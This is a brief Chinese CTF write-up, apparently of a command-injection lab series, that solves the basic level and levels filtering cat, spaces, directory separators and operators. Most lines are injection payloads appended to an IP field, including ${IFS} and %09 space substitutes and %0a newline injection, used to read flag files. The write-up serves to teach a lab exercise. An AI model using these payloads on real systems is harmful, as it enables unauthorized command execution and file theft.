命令注入解题思路,打开环境,填入127.0.0.1&ls 访问得到一个php文件,继续输入
127.0.0.1&cat 32506276723113.php|base64,访问后使用base64进行解码或是直接访问源代码找到flag。
过滤cat解题思路,与命令注入类似,不过访问php文件时要在flag前加more
127.0.0.1; more flag_19336906025702.php | base64 。接下来操作和上面一样。
过滤空格解题思路,我们的思路就是使用特殊符号过滤空格,使用IFS$9、%09、<、>、<>、{,}、%20、${IFS}、${IFS}来代替空格,进行如下操作,127.0.0.1&ls 127.0.0.1;cat<flag_229962408527938.php|base64,解码或访问源代码得到flag。
过滤目录分隔符解题思路,一样使用127.0.0.1&ls 进行拼接,然后列出目录127.0.0.1;ls flag_is_here,发现flag文件,列出
127.0.0.1;cd flag_is_here&&cat flag_19900138617064.php|base64
进行查找flag。
过滤运算符解题思路,打开环境,输入;ls进行拼接,得到flag文件,拼接
;cat flag_243452677723645.php访问源代码得到flag。
综合过滤练习解题思路,在命令行中输入/?ip=127.0.0.1%0als添加在后面并访问,
得到flag_is_here
